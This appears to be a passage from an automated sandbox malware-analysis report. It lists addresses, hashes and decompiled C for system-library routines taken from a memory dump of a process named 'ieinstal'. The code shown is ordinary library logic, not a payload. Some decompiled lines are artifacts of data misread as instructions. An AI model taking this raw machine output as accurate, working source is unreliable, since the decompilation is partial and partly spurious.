                                                            0x1ec7bac3
                                                            0x1ec7bac3
                                                            0x1ec7bac6
                                                            0x00000000
                                                            0x1ec7b9dd
                                                            0x1ec7b9dd
                                                            0x1ec7b9e7
                                                            0x1ec7b9e7
                                                            0x1ec7b9ec
                                                            0x1ec7b9ec
                                                            0x1ec7b9f1
                                                            0x1ec7b9f5
                                                            0x1ec7b9fa
                                                            0x1ec7ba00
                                                            0x1ec7ba0c
                                                            0x1ec7ba10
                                                            0x1ec7ba10
                                                            0x1ec7ba12
                                                            0x1ec7ba18
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7bb26
                                                            0x1ec7bb26
                                                            0x1ec7ba1e
                                                            0x1ec7ba1e
                                                            0x1ec7ba23
                                                            0x1ec7ba25
                                                            0x1ec7ba2c
                                                            0x1ec7ba30
                                                            0x1ec7ba35
                                                            0x1ec7ba35
                                                            0x1ec7ba41
                                                            0x1ec7ba46
                                                            0x1ec7ba4c
                                                            0x1ec7ba50
                                                            0x1ec7ba54
                                                            0x1ec7ba6a
                                                            0x1ec7ba6e
                                                            0x1ec7ba70
                                                            0x1ec7ba74
                                                            0x1ec7ba78
                                                            0x1ec7ba7a
                                                            0x1ec7ba7c
                                                            0x1ec7ba8e
                                                            0x1ec7ba90
                                                            0x1ec7ba92
                                                            0x1ec7bb14
                                                            0x1ec7bb14
                                                            0x1ec7bb16
                                                            0x1ec7bb16
                                                            0x00000000
                                                            0x1ec7ba7c
                                                            0x1ec7bb0a
                                                            0x1ec7bb0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7bb0f

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1EC7B9A5
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 885266447-0
                                                            • Opcode ID: 6ddc1314a0ebe74268e6409ea4ef4040aa6c2cd8421685a5c38416fb67e1876e
                                                            • Instruction ID: ad6186001f8b6886fdd84527443974031b2881be128742b9fd91237d8847cb9f
                                                            • Opcode Fuzzy Hash: 6ddc1314a0ebe74268e6409ea4ef4040aa6c2cd8421685a5c38416fb67e1876e
                                                            • Instruction Fuzzy Hash: 80515975A18341CFC310DF29C88091AFBE6BB88650F144A6EFA9A87358D730EC40CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC5B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E1EC5B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1ed2f7a8);
				E1ECAD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E1ECAD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E1EC9D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E1EC9F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L1ECADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E1EC9B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E1EC9B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E1EC9E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E1EC9A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                            0x1ec5b171
                                                            0x1ec5b171
                                                            0x1ec5b171
                                                            0x1ec5b171
                                                            0x1ec5b171
                                                            0x1ec5b176
                                                            0x1ec5b17b
                                                            0x1ec5b180
                                                            0x1ec5b186
                                                            0x1ec5b18f
                                                            0x1ec5b198
                                                            0x1ec5b1a4
                                                            0x1ec5b1aa
                                                            0x1ecb4802
                                                            0x1ecb4802
                                                            0x1ecb4805
                                                            0x1ecb480c
                                                            0x1ecb480e
                                                            0x1ec5b1d1
                                                            0x1ec5b1d3
                                                            0x1ec5b1de
                                                            0x1ec5b1de
                                                            0x1ecb4817
                                                            0x1ecb481e
                                                            0x1ecb4820
                                                            0x1ecb4822
                                                            0x1ecb4822
                                                            0x1ecb4824
                                                            0x1ecb4824
                                                            0x1ecb482a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb4835
                                                            0x1ecb483a
                                                            0x1ecb483d
                                                            0x1ecb483f
                                                            0x1ecb4842
                                                            0x1ecb4842
                                                            0x1ecb4842
                                                            0x1ecb4846
                                                            0x1ecb484c
                                                            0x1ecb484e
                                                            0x1ecb4851
                                                            0x1ecb4851
                                                            0x1ecb4853
                                                            0x1ecb4854
                                                            0x1ecb4854
                                                            0x1ecb4858
                                                            0x1ecb485a
                                                            0x1ecb485a
                                                            0x1ecb485d
                                                            0x1ecb485f
                                                            0x1ecb4861
                                                            0x1ecb4861
                                                            0x1ecb4866
                                                            0x1ecb486b
                                                            0x1ecb486e
                                                            0x1ecb4871
                                                            0x1ecb4876
                                                            0x1ecb4876
                                                            0x1ecb4878
                                                            0x1ecb487b
                                                            0x1ecb4884
                                                            0x1ecb4884
                                                            0x00000000
                                                            0x1ecb487d
                                                            0x1ecb487d
                                                            0x1ecb4882
                                                            0x1ecb4889
                                                            0x1ecb4889
                                                            0x1ecb488f
                                                            0x1ecb4891
                                                            0x1ecb48e0
                                                            0x1ecb48e2
                                                            0x1ecb48e4
                                                            0x1ecb48e4
                                                            0x1ecb48e7
                                                            0x1ecb48e7
                                                            0x1ecb48ed
                                                            0x1ecb48f4
                                                            0x1ecb48f6
                                                            0x1ecb4951
                                                            0x1ecb4951
                                                            0x1ecb4953
                                                            0x1ecb4953
                                                            0x1ecb4956
                                                            0x1ecb4956
                                                            0x1ecb4958
                                                            0x1ecb4959
                                                            0x1ecb4959
                                                            0x1ecb495d
                                                            0x1ecb495d
                                                            0x1ecb495f
                                                            0x1ecb495f
                                                            0x1ecb4965
                                                            0x1ecb4969
                                                            0x1ecb49ba
                                                            0x1ecb49ba
                                                            0x1ecb49c1
                                                            0x1ecb49c5
                                                            0x1ecb49cc
                                                            0x1ecb49d4
                                                            0x1ecb49d7
                                                            0x1ecb49da
                                                            0x1ecb49e4
                                                            0x1ecb49e5
                                                            0x1ecb49f3
                                                            0x1ecb4a02
                                                            0x00000000
                                                            0x1ecb4a02
                                                            0x1ecb4972
                                                            0x1ecb4974
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb4976
                                                            0x1ecb4979
                                                            0x1ecb4982
                                                            0x1ecb4983
                                                            0x1ecb4984
                                                            0x1ecb498b
                                                            0x1ecb498d
                                                            0x1ecb4991
                                                            0x1ecb4993
                                                            0x1ecb4999
                                                            0x1ecb499d
                                                            0x1ecb49a2
                                                            0x1ecb49a2
                                                            0x1ecb49a2
                                                            0x1ecb4999
                                                            0x1ecb49ac
                                                            0x00000000
                                                            0x1ecb49b3
                                                            0x1ecb48f8
                                                            0x1ecb48fe
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb48fe
                                                            0x1ecb4895
                                                            0x1ecb489c
                                                            0x1ecb48ad
                                                            0x1ecb48b2
                                                            0x1ecb48b5
                                                            0x1ecb48b7
                                                            0x1ecb48ba
                                                            0x1ecb48bc
                                                            0x1ecb48c6
                                                            0x1ecb48c6
                                                            0x1ecb48cb
                                                            0x1ecb48d1
                                                            0x1ecb48d4
                                                            0x1ecb48d8
                                                            0x1ecb48d8
                                                            0x00000000
                                                            0x1ecb48d8
                                                            0x1ecb48be
                                                            0x1ecb48c0
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb48c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb48c4
                                                            0x00000000
                                                            0x1ecb4882
                                                            0x1ecb487b
                                                            0x1ecb4904
                                                            0x1ecb4906
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb4908
                                                            0x1ecb490e
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb4910
                                                            0x1ecb4917
                                                            0x1ecb4917
                                                            0x00000000
                                                            0x1ecb4917
                                                            0x1ec5b1ba
                                                            0x1ecb47f9
                                                            0x1ecb47fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecb47fc
                                                            0x1ec5b1c0
                                                            0x1ec5b1c0
                                                            0x1ec5b1c3
                                                            0x1ec5b1cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: _vswprintf_s
                                                            • String ID:
                                                            • API String ID: 677850445-0
                                                            • Opcode ID: 2c57f6c0dd23e144f6ca1c79a8dcceffa78dd14df847007674b27d80889d4ad6
                                                            • Instruction ID: 19ea6b77ba919edcdeafdf49713ae0eee9586dd989efc0426e42fbbc2257b54f
                                                            • Opcode Fuzzy Hash: 2c57f6c0dd23e144f6ca1c79a8dcceffa78dd14df847007674b27d80889d4ad6
                                                            • Instruction Fuzzy Hash: C451D376D1439A8FDB21CF64CC40BAEBBB1BF00750F1043A9E859AB285E7714941CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC82581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E1EC82581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				unsigned int _t281;
				signed int _t285;
				void* _t286;
				signed int _t287;
				signed int _t291;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t325;
				signed int _t327;
				void* _t328;
				signed int _t330;
				void* _t331;

				_t325 = _t327;
				_t328 = _t327 - 0x4c;
				_v8 =  *0x1ed4d360 ^ _t325;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x1ed4b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t281 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t331 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t274 = 0x48;
				_t301 = 0 | _t331 == 0x00000000;
				_t313 = 0;
				_v37 = _t331 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L1EC74620(_t281,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t301 = _v32;
							 *(_t320 + 0x3c) = _t274;
							_t276 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t301;
							if(_t301 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t301 - 0x1ed48478;
								 *_t320 = ((0 | _t301 == 0x1ed48478) - 0x00000001 & 0xfffffffb) + 7;
								E1EC9F3E0(_t315,  *((intOrPtr*)(_t301 + 4)),  *_t301 & 0x0000ffff);
								_t301 = _v32;
								_t328 = _t328 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t301 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E1ECE39F2(_t315);
									_t301 = _v32;
									_t315 = _t268;
								}
							}
							_t285 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t274 = _t320 + _t276 * 4;
								_v56 = _t274;
								do {
									__eflags = _t301;
									if(_t301 != 0) {
										_t230 =  *(_v60 + _t285 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t274 =  *(_v60 + _t285 * 4);
										 *(_t274 + 0x18) = _t315;
										_t234 =  *(_v60 + _t285 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1EC82959))) {
												case 0:
													__ax =  *0x1ed48488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1EC9F3E0(__edi,  *0x1ed4848c, __ax & 0x0000ffff);
														__eax =  *0x1ed48488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1EC9F3E0(_t315, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x1ed48480 & 0x0000ffff = E1EC9F3E0(__edi,  *0x1ed48484,  *0x1ed48480 & 0x0000ffff);
													__eax =  *0x1ed48480 & 0x0000ffff;
													__eax = ( *0x1ed48480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1EC9F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1EC9F3E0(_t315, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t328 = _t328 + 0xc;
													_t315 = _t315 + (_t263 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t315 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x1ed4575c;
													__eflags = __ebx - 0x1ed4575c;
													if(__ebx != 0x1ed4575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1EC9F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1ed4575c;
														} while (__ebx != 0x1ed4575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1ed48478 & 0x0000ffff = E1EC9F3E0(__edi,  *0x1ed4847c,  *0x1ed48478 & 0x0000ffff);
													__eax =  *0x1ed48478 & 0x0000ffff;
													__eax = ( *0x1ed48478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1ECE39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1ed46e58 & 0x0000ffff = E1EC9F3E0(__edi,  *0x1ed46e5c,  *0x1ed46e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1ed46e58 & 0x0000ffff;
													__eax = ( *0x1ed46e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t285 = _v16;
													_t301 = _v32;
													L29:
													_t274 = _t274 + 4;
													__eflags = _t274;
													_v56 = _t274;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t285 = _t285 + 1;
									_v16 = _t285;
									__eflags = _t285 - _v48;
								} while (_t285 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1EC82935))) {
							case 0:
								__ax =  *0x1ed48488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t301 =  &_v64;
								_v80 = E1EC82E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1ed48480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1ed48480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1EC6EEF0(0x1ed479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1EC6EB70(__ecx, 0x1ed479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t281 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1ed47b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1EC74620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1EC6EB70(__ecx, 0x1ed479a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t325;
										_pop(_t275);
										return E1EC9B640(_t209, _t275, _v8 ^ _t325, _t301, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t301 =  &_v36;
									_t272 = E1EC82E3E(_t270,  &_v36);
									_t281 = _v36;
									_v76 = _t272;
								}
								if(_t281 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t281;
								}
								goto L14;
							case 6:
								__eax =  *0x1ed45764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1ed48478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1ed48478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1ed46e58 & 0x0000ffff;
								__eax = ( *0x1ed46e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t301 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t286 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("enter 0x661e, 0x28");
					asm("enter 0xe01e, 0x27");
					asm("enter 0x2e1e, 0x26");
					asm("enter 0x461e, 0x28");
					asm("enter 0x51e, 0x26");
					asm("enter 0x1f1e, 0x5b");
					asm("int3");
					_push(ds);
					_t330 = _t234;
					_push(ds);
					_push(ds);
					 *((char*)((_t328 - _t286 ^ 0x021ecc5b) - _t286)) =  *((char*)((_t328 - _t286 ^ 0x021ecc5b) - _t286)) - 0xc8;
					_push(ds);
					asm("enter 0x1e1e, 0x28");
					asm("enter 0x4e1e, 0x28");
					asm("enter 0x5d1e, 0x27");
					asm("enter 0xd81e, 0x5b");
					asm("int3");
					_push(ds);
					asm("enter 0x341e, 0x5c");
					asm("int3");
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1ed2ff00);
					E1ECAD08C(_t274, _t315, _t320);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t278 = _a12;
					__eflags = _t278;
					if(_t278 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t323 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t291 = _t245 * 0xc;
							_v48 = _t291;
							__eflags = _t278 -  *((intOrPtr*)(_t291 + 0x1ec31664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E1EC9E5C0(_a8,  *((intOrPtr*)(_t291 + 0x1ec31668)), _t278);
									_t330 = _t330 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t323 = E1ECD51BE(_t278,  *((intOrPtr*)(_v48 + 0x1ec3166c)), _a16, _t316, _t323, __eflags, _a20, _a24);
										_v52 = _t323;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t323;
						__eflags = _t323;
						if(_t323 < 0) {
							__eflags = _t323 - 0xc0000100;
